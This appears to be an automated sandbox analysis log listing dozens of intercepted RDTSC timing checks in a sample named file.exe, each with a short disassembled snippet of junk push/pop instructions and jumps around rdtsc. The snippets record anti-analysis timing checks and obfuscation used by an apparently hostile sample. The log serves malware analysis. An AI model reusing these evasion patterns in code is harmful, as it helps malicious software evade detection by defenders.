Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115147E second address: 1151487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1159888 second address: 115988E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115988E second address: 1159898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11579B2 second address: 11579CB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007EFDB8CDCB0Ch 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1157CCF second address: 1157CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1157CD4 second address: 1157CF4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007EFDB8CDCB18h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1157CF4 second address: 1157CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1157FDF second address: 1157FEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007EFDB8CDCB06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1157FEA second address: 1158009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFDB8F26A29h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1158009 second address: 1158021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jne 00007EFDB8CDCB0Ch 0x0000000e jne 00007EFDB8CDCB06h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1158021 second address: 1158027 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11582BE second address: 11582C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1158533 second address: 115853A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115853A second address: 115853F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1158B09 second address: 1158B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007EFDB8F26A16h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115902C second address: 1159042 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007EFDB8CDCB10h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1159042 second address: 1159048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1159048 second address: 1159063 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8CDCB17h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115AF1C second address: 115AF22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115AF22 second address: 115AF41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8CDCB17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11636C6 second address: 1163715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007EFDB8F26A18h 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 popad 0x00000012 pushad 0x00000013 push esi 0x00000014 js 00007EFDB8F26A16h 0x0000001a push esi 0x0000001b pop esi 0x0000001c pop esi 0x0000001d pushad 0x0000001e jmp 00007EFDB8F26A28h 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 jmp 00007EFDB8F26A23h 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1163715 second address: 116371B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11629E3 second address: 11629E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11629E7 second address: 11629ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11629ED second address: 11629F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1162B57 second address: 1162B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1162D1D second address: 1162D38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFDB8F26A27h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1163071 second address: 1163083 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007EFDB8CDCB0Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11632E8 second address: 11632ED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116CBD5 second address: 116CBEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007EFDB8CDCB0Eh 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116B1B9 second address: 116B1D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007EFDB8F26A1Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jg 00007EFDB8F26A16h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116B4AC second address: 116B4B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116B4B0 second address: 116B4B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116B5E0 second address: 116B5F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8CDCB0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007EFDB8CDCB06h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116B5F6 second address: 116B5FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116B5FA second address: 116B606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007EFDB8CDCB06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116B606 second address: 116B610 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFDB8F26A1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116B744 second address: 116B77C instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFDB8CDCB12h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFDB8CDCB12h 0x00000011 jne 00007EFDB8CDCB0Eh 0x00000017 pushad 0x00000018 popad 0x00000019 ja 00007EFDB8CDCB06h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116BB5E second address: 116BB7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007EFDB8F26A1Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116BB7D second address: 116BB83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116BB83 second address: 116BB87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116CA73 second address: 116CA77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116CA77 second address: 116CA91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A26h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116CA91 second address: 116CA9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116A884 second address: 116A88A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116A88A second address: 116A88F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116A88F second address: 116A8A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A24h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117F3DC second address: 117F40C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8CDCB12h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007EFDB8CDCB18h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117F56F second address: 117F577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1185A30 second address: 1185A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1185A35 second address: 1185A41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007EFDB8F26A16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1185A41 second address: 1185A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1185A45 second address: 1185A49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B3F3F second address: 10B3F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B3F45 second address: 10B3F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B3F4E second address: 10B3F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B3F52 second address: 10B3F7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007EFDB8F26A26h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnc 00007EFDB8F26A16h 0x00000012 pushad 0x00000013 popad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118E94A second address: 118E950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119C72E second address: 119C738 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFDB8F26A16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119AF4D second address: 119AF72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8CDCB13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b js 00007EFDB8CDCB06h 0x00000011 pop edx 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119AF72 second address: 119AF81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jl 00007EFDB8F26A16h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119B3CD second address: 119B3D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119B67F second address: 119B69D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFDB8F26A20h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b jg 00007EFDB8F26A1Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A0063 second address: 11A007E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007EFDB8CDCB13h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A007E second address: 11A0082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A0082 second address: 11A0086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A0086 second address: 11A008F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AE922 second address: 11AE92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AE92D second address: 11AE931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AE931 second address: 11AE94A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFDB8CDCB0Ah 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AE94A second address: 11AE950 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AC3E0 second address: 11AC3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AC3E4 second address: 11AC3EE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007EFDB8F26A16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AC3EE second address: 11AC3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jbe 00007EFDB8CDCB06h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AC3FE second address: 11AC402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AC402 second address: 11AC40A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AC40A second address: 11AC426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFDB8F26A28h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AC426 second address: 11AC42A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BC424 second address: 11BC452 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007EFDB8F26A16h 0x00000009 jmp 00007EFDB8F26A1Ah 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jnp 00007EFDB8F26A32h 0x00000017 pushad 0x00000018 jno 00007EFDB8F26A16h 0x0000001e pushad 0x0000001f popad 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 push esi 0x00000028 pop esi 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BDF56 second address: 11BDF76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jmp 00007EFDB8CDCB19h 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BDF76 second address: 11BDF81 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BDF81 second address: 11BDF87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D7CDB second address: 11D7CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jnc 00007EFDB8F26A16h 0x0000000c jns 00007EFDB8F26A16h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D7CF4 second address: 11D7CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D7CF8 second address: 11D7D09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFDB8F26A1Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D6C31 second address: 11D6C73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007EFDB8CDCB06h 0x00000009 jmp 00007EFDB8CDCB19h 0x0000000e jno 00007EFDB8CDCB06h 0x00000014 popad 0x00000015 jns 00007EFDB8CDCB12h 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D6C73 second address: 11D6C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D6C77 second address: 11D6C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007EFDB8CDCB12h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D7674 second address: 11D767A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DBD06 second address: 11DBD35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007EFDB8CDCB06h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edx, ebx 0x00000010 push 00000004h 0x00000012 mov edx, edi 0x00000014 call 00007EFDB8CDCB09h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007EFDB8CDCB10h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DBD35 second address: 11DBD3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DBD3B second address: 11DBD3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DBD3F second address: 11DBD7A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007EFDB8F26A27h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007EFDB8F26A1Fh 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c pushad 0x0000001d popad 0x0000001e pop ebx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DC018 second address: 11DC01C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DD8FF second address: 11DD903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DD4C4 second address: 11DD4C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DD4C8 second address: 11DD4E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFDB8F26A1Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jne 00007EFDB8F26A16h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DD4E6 second address: 11DD4EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DD4EA second address: 11DD4FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jo 00007EFDB8F26A16h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F8FF5 second address: 10F8FFA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
